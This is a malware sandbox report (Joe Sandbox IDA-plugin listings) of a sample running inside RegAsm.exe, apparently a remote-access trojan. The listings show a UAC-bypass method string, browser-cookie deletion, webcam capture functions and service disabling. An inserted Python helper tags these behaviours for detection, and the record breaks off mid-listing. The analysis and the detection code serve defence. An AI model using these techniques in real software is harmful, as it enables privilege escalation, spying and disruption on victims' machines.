                                          • Source File: 0000000C.00000002.913240346.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 0000000C.00000002.913228394.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.913240346.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_10000000_RegAsm.jbxd
                                          Similarity
                                          • API ID: _free$ErrorFreeHeapLast
                                          • String ID:
                                          • API String ID: 776569668-0
                                          • Opcode ID: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                                          • Instruction ID: 62dea9ede071ec04ae7e8d39c2d2a9b8d59ba4565e42afa4a1a73bd13a3591d1
                                          • Opcode Fuzzy Hash: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                                          • Instruction Fuzzy Hash: 3E118E35548B08FAFA20EBB0EC47FCB7B9DEF04780F400824BA9DB6097DA25B5249751
                                          APIs
                                          • std::_Lockit::_Lockit.LIBCPMT ref: 004111AB
                                          • int.LIBCPMT ref: 004111BE
                                            • Part of subcall function 0040E0FC: std::_Lockit::_Lockit.LIBCPMT ref: 0040E10D
                                            • Part of subcall function 0040E0FC: std::_Lockit::~_Lockit.LIBCPMT ref: 0040E127
                                          • std::_Facet_Register.LIBCPMT ref: 004111FE
                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 00411207
                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 00411225
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                          • String ID: (mG
                                          • API String ID: 2536120697-4059303827
                                          • Opcode ID: 1b5c7adf1a629fe2bc242511ea8b9d41abd54e1fd7f2f3a966b13196985dc313
                                          • Instruction ID: b4facbf35e110c19f3eede998f69f9310dce987b63f856d60fe44c7d5fb17b17
                                          • Opcode Fuzzy Hash: 1b5c7adf1a629fe2bc242511ea8b9d41abd54e1fd7f2f3a966b13196985dc313
                                          • Instruction Fuzzy Hash: 42112732900114A7CB14EB9AD8018DEB7699F44364F11456FF904F72E1DB789E45CBC8
                                          APIs
                                          • GetLastError.KERNEL32(?,?,0043A3D1,0043933E), ref: 0043A3E8
                                          • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0043A3F6
                                          • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0043A40F
                                          • SetLastError.KERNEL32(00000000,?,0043A3D1,0043933E), ref: 0043A461
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ErrorLastValue___vcrt_
                                          • String ID:
                                          • API String ID: 3852720340-0
                                          • Opcode ID: 786e665d26cf754d1d2cf441f113ccf6d654ddd054b4af6544b9cbcea7eecff9
                                          • Instruction ID: 228fd8bb196f6ae1284969ba5442ea73dc67404c1df350b3d70410c0baad6fb0
                                          • Opcode Fuzzy Hash: 786e665d26cf754d1d2cf441f113ccf6d654ddd054b4af6544b9cbcea7eecff9
                                          • Instruction Fuzzy Hash: 87019C322483515EA61027797C8A62B2648EB293B9F30523FF518805F1EF984C90910D
                                          APIs
                                          • CoInitializeEx.OLE32(00000000,00000002), ref: 0040760B
                                            • Part of subcall function 00407538: _wcslen.LIBCMT ref: 0040755C
                                            • Part of subcall function 00407538: CoGetObject.OLE32(?,00000024,00466528,00000000), ref: 004075BD
                                          • CoUninitialize.OLE32 ref: 00407664
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: InitializeObjectUninitialize_wcslen
                                          • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$[+] ShellExec success$[+] before ShellExec$[+] ucmCMLuaUtilShellExecMethod
                                          • API String ID: 3851391207-1839356972
                                          • Opcode ID: d877cea0863f9d3afa12868748af2f8600b5022738d517222c004e226c4c5a05
                                          • Instruction ID: e4e7d1672fbddd81374e29e92f863be8f9bad83f72bb7a306ddb251afa86686e
                                          • Opcode Fuzzy Hash: d877cea0863f9d3afa12868748af2f8600b5022738d517222c004e226c4c5a05
                                          • Instruction Fuzzy Hash: 4501D272B087116BE2246B65DC4AF6B3748DB41B25F11053FF901A62C1EAB9FC0146AB
                                          APIs
                                          • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 0040BB18
                                          • GetLastError.KERNEL32 ref: 0040BB22
                                          Strings
                                          • [Chrome Cookies found, cleared!], xrefs: 0040BB48
                                          • UserProfile, xrefs: 0040BAE8
                                          • [Chrome Cookies not found], xrefs: 0040BB3C
                                          • \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 0040BAE3
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: DeleteErrorFileLast
                                          • String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
                                          • API String ID: 2018770650-304995407
                                          • Opcode ID: e57bb7af6ede7258cae938a4b9e303b9ad2d55d8c8bd3889b57b796562934694
                                          • Instruction ID: 5dee569c6883bfd73109a670bb68234af0f28e4caad238985ba957b2c74b96e7
                                          • Opcode Fuzzy Hash: e57bb7af6ede7258cae938a4b9e303b9ad2d55d8c8bd3889b57b796562934694
                                          • Instruction Fuzzy Hash: 5B01DF71A402055BCA04B7B6CC1B9BE7B24E922704B50017FF502726D6FE3E5D0986CE
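The function listings in this section (the IE-cookie check built on ExpandEnvironmentStringsA and PathFileExistsA, the CreateFileW/SetFilePointer/WriteFile routine, the CoGetObject call that sits beside the "[+] ucmCMLuaUtilShellExecMethod" string, the DeleteFileA call on the Chrome Cookies path, and the ChangeServiceConfigW call with a start type of 4) can be turned into behaviour tags mechanically instead of by reading each block. The Python below is an added example for this report, not Joe Sandbox code and not part of the report itself. It assumes the block layout visible on this page and infers the snapshot naming hcaresult_<pid>_<n>_<base>_<process>.jbxd from the listings (neither is documented here); argument values are interpreted only with documented Win32 constants (FILE_END = 2, SERVICE_DISABLED = 4). The sample text is constructed from excerpts of this page's own listings.

```python
# Added example for this report (not Joe Sandbox code): parse the IDA-plugin function
# listings shown on this page into behaviour tags. Assumed from the page, not documented:
# the block layout and snapshot names of the form hcaresult_<pid>_<n>_<base>_<process>.jbxd.
import re
from collections import namedtuple
from dataclasses import dataclass, field

ApiCall = namedtuple("ApiCall", "name module args ref via_subcall")  # args: hex strings, '?' = unresolved
_API_RE = re.compile(r"^(?:Part of subcall function ([0-9A-F]{8}):\s*)?"   # optional subcall prefix
                     r"(\S+?)\.([A-Z0-9]+)(?:\((.*)\))?,?\s*ref:\s*([0-9A-F]{8})$")
_XREF_RE = re.compile(r"^(.*), xrefs: [0-9A-F]{8}$")
_SNAP_RE = re.compile(r"hcaresult_(\d+)_\d+_([0-9A-Fa-f]+)_(.+)\.jbxd")
_HEADERS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Yara matches", "Similarity"}
FILE_END, SERVICE_DISABLED = 2, 4  # documented Win32 constants

@dataclass
class FunctionBlock:
    apis: list = field(default_factory=list)
    strings: list = field(default_factory=list)
    process: str = ""
    pid: int = 0
    base: int = 0
    def api_names(self): return {a.name for a in self.apis}
    def calls(self, name): return [a for a in self.apis if a.name == name]
    def mentions(self, needle): return any(needle.lower() in s.lower() for s in self.strings)

def parse_blocks(text):
    """One FunctionBlock per listing; a listing ends at its Instruction Fuzzy Hash line."""
    blocks, cur, section = [], FunctionBlock(), ""
    for raw in text.splitlines():
        line = raw.strip().lstrip("•").strip()
        if line in _HEADERS:
            section = line
        elif section == "APIs" and (m := _API_RE.match(line)):
            sub, name, mod, args, ref = m.groups()
            cur.apis.append(ApiCall(name, mod, args.split(",") if args else [], ref, sub or ""))
        elif section == "Strings" and (m := _XREF_RE.match(line)):
            cur.strings.append(m.group(1))
        elif line.startswith("String ID:"):   # '$'-joined list of referenced strings
            cur.strings += [s for s in line[10:].strip().split("$") if s]
        elif line.startswith("Snapshot File:") and (m := _SNAP_RE.search(line)):
            cur.pid, cur.base, cur.process = int(m.group(1)), int(m.group(2), 16), m.group(3)
        elif line.startswith("Instruction Fuzzy Hash:"):
            blocks.append(cur)
            cur, section = FunctionBlock(), ""
    if cur.apis or cur.strings:   # a listing cut off before its hash line still counts
        blocks.append(cur)
    return blocks

def _arg(call, i):
    try:
        return int(call.args[i], 16)
    except (IndexError, ValueError):   # missing, or '?' (unresolved by the sandbox)
        return None

def classify(b):
    """Behaviour tags implied by one listing; a tag means the capability is present, not that it ran."""
    tags, names = [], b.api_names()
    if b.mentions("Cookies") and names & {"DeleteFileA", "DeleteFileW", "PathFileExistsA", "PathFileExistsW"}:
        tags.append("browser-cookie-wipe")
    if "CoGetObject" in names and b.mentions("ucmCMLuaUtilShellExecMethod"):
        tags.append("uac-bypass-cmstplua")   # UACMe method name beside an elevation-moniker object request
    if names >= {"CreateFileW", "WriteFile"} and any(_arg(c, 3) == FILE_END for c in b.calls("SetFilePointer")):
        tags.append("append-to-file")       # SetFilePointer(..., FILE_END) before WriteFile
    if any(_arg(c, 2) == SERVICE_DISABLED for c in b.calls("ChangeServiceConfigW")):
        tags.append("service-disable")      # dwStartType == SERVICE_DISABLED
    return tags

# Constructed sample: excerpts of five listings copied from this report (RegAsm.exe, PID 12).
SAMPLE = r"""
APIs
• ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 0040BFA6
• PathFileExistsA.SHLWAPI(?), ref: 0040BFB3
• Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
• String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
• Instruction Fuzzy Hash: BC215230A40219A6CB14F7F1CC969EE77299F50744F80017FE502B71D1EB7D6945C6DA
APIs
• CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000), ref: 0041C4C1
• SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0041C4DE
• WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0041C4FB
• Instruction Fuzzy Hash: 6311E571288215BFE7104A24ACC8EBB739CEB46365F10862BF912D22D0C624DC418639
APIs
• Part of subcall function 00407538: CoGetObject.OLE32(?,00000024,00466528,00000000), ref: 004075BD
• String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$[+] ShellExec success$[+] ucmCMLuaUtilShellExecMethod
• Instruction Fuzzy Hash: 4501D272B087116BE2246B65DC4AF6B3748DB41B25F11053FF901A62C1EAB9FC0146AB
APIs
• DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 0040BB18
Strings
• [Chrome Cookies found, cleared!], xrefs: 0040BB48
• \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 0040BAE3
• Instruction Fuzzy Hash: 5B01DF71A402055BCA04B7B6CC1B9BE7B24E922704B50017FF502726D6FE3E5D0986CE
APIs
• ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,0041A41F,00000000), ref: 0041AD6F
"""

if __name__ == "__main__":
    for b in parse_blocks(SAMPLE):
        print(f"{b.process}[{b.pid}] {[a.name for a in b.apis]} -> {classify(b)}")
```

Run it over a plain-text export of the report's function section. Arguments the sandbox prints as "?" are unresolved and never satisfy a numeric rule, so a routine whose start-type or seek-origin argument was not resolved is left untagged rather than guessed at. The tags describe capabilities present in the dumped code, which is all a static call listing supports; whether a routine actually executed in this run is answered by the report's behaviour and Sigma sections, not by this section.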
                                          Strings
                                          • Rmc-OT0ZCG, xrefs: 00407715
                                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, xrefs: 004076FF
                                          • `.p, xrefs: 004076DF
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$Rmc-OT0ZCG$`.p
                                          • API String ID: 0-1225566033
                                          • Opcode ID: 9875d9faf70918787a925bf8ffd0fe05ff0f1e0d4d07a7049234b56cd1ae4be9
                                          • Instruction ID: 5ffff352cfcc2e87221e4fa572a01d73507d198e899e6baa5594ec663d9dd15d
                                          • Opcode Fuzzy Hash: 9875d9faf70918787a925bf8ffd0fe05ff0f1e0d4d07a7049234b56cd1ae4be9
                                          • Instruction Fuzzy Hash: 8DF02BB0E04600EBCB1477345D296AA3656A780397F40487BF507EB2F2EBBD5C41871E
                                          APIs
                                          • __allrem.LIBCMT ref: 0043ACE9
                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043AD05
                                          • __allrem.LIBCMT ref: 0043AD1C
                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043AD3A
                                          • __allrem.LIBCMT ref: 0043AD51
                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043AD6F
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                          • String ID:
                                          • API String ID: 1992179935-0
                                          • Opcode ID: 3b7debe300bd30616e6d17b60b5e1d5511deed8aaa3e59a787e888dcedb96ab2
                                          • Instruction ID: c7cd181284538591ee8af1586cca3d38175ba7b34bac8e5aa56d350f01832762
                                          • Opcode Fuzzy Hash: 3b7debe300bd30616e6d17b60b5e1d5511deed8aaa3e59a787e888dcedb96ab2
                                          • Instruction Fuzzy Hash: 5F815972A40B05ABE7209F29CC41B6FB3A99F48324F24152FF591D67C1E77CE910875A
                                          APIs
                                          • Sleep.KERNEL32(00000000,0040D29D), ref: 004044C4
                                            • Part of subcall function 00404607: __EH_prolog.LIBCMT ref: 0040460C
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: H_prologSleep
                                          • String ID: CloseCamera$FreeFrame$GetFrame$HNG$OpenCamera
                                          • API String ID: 3469354165-3054508432
                                          • Opcode ID: 4647b3a2d276aae203f7a96e08ca0eaa792698452bb0acf0d7caf0005d5321f1
                                          • Instruction ID: df1e58e957a7578ae16e417911435538e3341edc64810737793f4aa4f8849b6c
                                          • Opcode Fuzzy Hash: 4647b3a2d276aae203f7a96e08ca0eaa792698452bb0acf0d7caf0005d5321f1
                                          • Instruction Fuzzy Hash: A751E171A042106BCA14FB369D0A66E3755ABC4748F00443FFA0A676E2DF7D8E45839E
                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: __cftoe
                                          • String ID:
                                          • API String ID: 4189289331-0
                                          • Opcode ID: df708042516445aa89903c6330052172adb2df4233c064de01baf1be20d0a2ef
                                          • Instruction ID: b93b8478136607885b926496a305f1bfb884a7f6acf724e610c81469f19cb9e5
                                          • Opcode Fuzzy Hash: df708042516445aa89903c6330052172adb2df4233c064de01baf1be20d0a2ef
                                          • Instruction Fuzzy Hash: 2551FD72500605ABFF209B598C81EAF77A8EF45334F25421FF915A6293DB3DD900C66D
                                          APIs
                                          • _strlen.LIBCMT ref: 10001607
                                          • _strcat.LIBCMT ref: 1000161D
                                          • lstrlenW.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,1000190E,?,?,00000000,?,00000000), ref: 10001643
                                          • lstrcatW.KERNEL32(?,?), ref: 1000165A
                                          • lstrlenW.KERNEL32(?,?,?,?,?,1000190E,?,?,00000000,?,00000000,?,?,?,00000104,?), ref: 10001661
                                          • lstrcatW.KERNEL32(00001008,?), ref: 10001686
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.913240346.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 0000000C.00000002.913228394.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.913240346.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_10000000_RegAsm.jbxd
                                          Similarity
                                          • API ID: lstrcatlstrlen$_strcat_strlen
                                          • String ID:
                                          • API String ID: 1922816806-0
                                          • Opcode ID: 315c55c979a72bdf3ac51594b752bef976f460307e9923370b73d2b1bd80b905
                                          • Instruction ID: a267a6945d1554df97f4c8e17fbec8689bbb0548aac84132402ab8fad08d9bbc
                                          • Opcode Fuzzy Hash: 315c55c979a72bdf3ac51594b752bef976f460307e9923370b73d2b1bd80b905
                                          • Instruction Fuzzy Hash: 9821A776900204ABEB05DBA4DC85FEE77B8EF88750F24401BF604AB185DF34B94587A9
                                          APIs
                                          • lstrcatW.KERNEL32(?,?), ref: 10001038
                                          • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 1000104B
                                          • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 10001061
                                          • lstrlenW.KERNEL32(?,?,?,?,?,00000000), ref: 10001075
                                          • GetFileAttributesW.KERNEL32(?,?,?,00000000), ref: 10001090
                                          • lstrlenW.KERNEL32(?,?,?,00000000), ref: 100010B8
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.913240346.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 0000000C.00000002.913228394.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.913240346.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_10000000_RegAsm.jbxd
                                          Similarity
                                          • API ID: lstrlen$AttributesFilelstrcat
                                          • String ID:
                                          • API String ID: 3594823470-0
                                          • Opcode ID: c62e9e5fa69f7526a4dcdb62aa87bf44082eca201cfcddb2e536fed9ba73336f
                                          • Instruction ID: f5da6160d3db499da992451a69b84f141dc83571de07cfa19ff2ab3d93a8fd2c
                                          • Opcode Fuzzy Hash: c62e9e5fa69f7526a4dcdb62aa87bf44082eca201cfcddb2e536fed9ba73336f
                                          • Instruction Fuzzy Hash: DB21E5359003289BEF10DBA0DC48EDF37B8EF44294F104556E999931A6DE709EC5CF50
                                          APIs
                                          • OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,00000000,?,?,?,0041A41F,00000000), ref: 0041AD19
                                          • OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,?,?,0041A41F,00000000), ref: 0041AD2D
                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A41F,00000000), ref: 0041AD3A
                                          • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,0041A41F,00000000), ref: 0041AD6F
                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A41F,00000000), ref: 0041AD81
                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A41F,00000000), ref: 0041AD84
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Service$CloseHandle$Open$ChangeConfigManager
                                          • String ID:
                                          • API String ID: 493672254-0
                                          • Opcode ID: f0f747c63b9e12e72378a2591e571a85e7fda5b6d41ee6cbe89889ce84539f3f
                                          • Instruction ID: 77e668261cf9ee2bd18e5a0e87596c089765e66a1be6d3c981f75cbf7ed2a716
                                          • Opcode Fuzzy Hash: f0f747c63b9e12e72378a2591e571a85e7fda5b6d41ee6cbe89889ce84539f3f
                                          • Instruction Fuzzy Hash: A7016D311462157AD6111B34AC4EFFB3B6CDB02772F10032BF625965D1DA68CE8195AB
                                          APIs
                                          • GetLastError.KERNEL32(?,?,10003518,100023F1,10001F17), ref: 10003864
                                          • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 10003872
                                          • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 1000388B
                                          • SetLastError.KERNEL32(00000000,?,10003518,100023F1,10001F17), ref: 100038DD
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.913240346.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 0000000C.00000002.913228394.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.913240346.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_10000000_RegAsm.jbxd
                                          Similarity
                                          • API ID: ErrorLastValue___vcrt_
                                          • String ID:
                                          • API String ID: 3852720340-0
                                          • Opcode ID: 669731f2127195b9a905fed2c89c9d5b837464d933d8447bfa53086d9201cd33
                                          • Instruction ID: 2a33bd680f99e964f7cdf1ea0b0e713dcb61597015083b2077453114c578dac0
                                          • Opcode Fuzzy Hash: 669731f2127195b9a905fed2c89c9d5b837464d933d8447bfa53086d9201cd33
                                          • Instruction Fuzzy Hash: 0F012432608B225EF207D7796CCAA0B2BDDDB096F9B20C27AF510940E9EF219C009300
                                          APIs
                                          • GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                          • _free.LIBCMT ref: 004482CC
                                          • _free.LIBCMT ref: 004482F4
                                          • SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 00448301
                                          • SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                          • _abort.LIBCMT ref: 00448313
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ErrorLast$_free$_abort
                                          • String ID:
                                          • API String ID: 3160817290-0
                                          • Opcode ID: 0dc6b6a3e4ae5b17dec3dccad88ee1f92140bcc2d5108ccd544116d6be2417e2
                                          • Instruction ID: 8d34d3ffa9a8a5ca7629c839d325bdddc3ef58a145117f7ac1d0225592351e3a
                                          • Opcode Fuzzy Hash: 0dc6b6a3e4ae5b17dec3dccad88ee1f92140bcc2d5108ccd544116d6be2417e2
                                          • Instruction Fuzzy Hash: 8EF0A435101B006BF611772A6C06B6F26599BD3B69F36042FFD18962D2EF6DCC42816D
                                          APIs
                                          • GetLastError.KERNEL32(?,?,10006C6C), ref: 10005AFA
                                          • _free.LIBCMT ref: 10005B2D
                                          • _free.LIBCMT ref: 10005B55
                                          • SetLastError.KERNEL32(00000000,?,?,10006C6C), ref: 10005B62
                                          • SetLastError.KERNEL32(00000000,?,?,10006C6C), ref: 10005B6E
                                          • _abort.LIBCMT ref: 10005B74
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.913240346.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 0000000C.00000002.913228394.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.913240346.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_10000000_RegAsm.jbxd
                                          Similarity
                                          • API ID: ErrorLast$_free$_abort
                                          • String ID:
                                          • API String ID: 3160817290-0
                                          • Opcode ID: c9cb188a03aa1811073f11ee06fa520bea6a831bfab7ff5292fc2b03e8e202de
                                          • Instruction ID: 6ab9c425fee0725613b21b3b36aaf5e4259b246f4cabca8c388d0d7fb541d563
                                          • Opcode Fuzzy Hash: c9cb188a03aa1811073f11ee06fa520bea6a831bfab7ff5292fc2b03e8e202de
                                          • Instruction Fuzzy Hash: 8FF0A47A508911AAF212E3346C4AF0F36AACBC55E3F264125F918A619DFF27B9024174
                                          APIs
                                          • OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,00000001,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB46
                                          • OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB5A
                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB67
                                          • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB76
                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB88
                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB8B
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Service$CloseHandle$Open$ControlManager
                                          • String ID:
                                          • API String ID: 221034970-0
                                          • Opcode ID: 754c0925ec177a5049a93b7fce8159a8319844bdb89c9ef35b94d9fd17db8e33
                                          • Instruction ID: 443f58cffa4f299642b313368f914f767bd977a6fac550f0ec2f38f013616b5a
